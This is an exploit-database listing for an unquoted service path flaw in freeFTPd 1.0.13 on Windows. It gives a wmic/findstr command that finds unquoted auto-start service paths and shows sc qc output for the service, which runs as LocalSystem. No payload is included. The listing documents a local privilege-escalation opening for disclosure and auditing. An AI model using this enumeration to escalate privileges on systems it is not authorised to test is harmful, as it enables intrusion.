Exploit for freeFTPd 1.0.13 Unquoted Service Path

Name: Exploit for freeFTPd 1.0.13 Unquoted Service Path
Rating: 5 (114 reviews)

2020-02-11 | CVSS 0.2

## https://sploitus.com/exploit?id=PACKETSTORM:156283
Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path  
Exploit Author: boku  
Date: 2020-02-10  
Vendor Homepage: http://www.freesshd.com  
Software Link: http://www.freesshd.com/freeFTPd.exe  
Version: 1.0.13  
Tested On: Windows 10 (32-bit)  
  
C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """  
freeFTPdService C:\Program Files\freeSSHd\freeFTPdService.exe Auto  
  
C:\Users\nightelf>sc qc freeFTPdService  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: freeFTPdService  
TYPE : 110 WIN32_OWN_PROCESS (interactive)  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\freeSSHd\freeFTPdService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : freeFTPdService  
DEPENDENCIES : RPCSS  
SERVICE_START_NAME : LocalSystem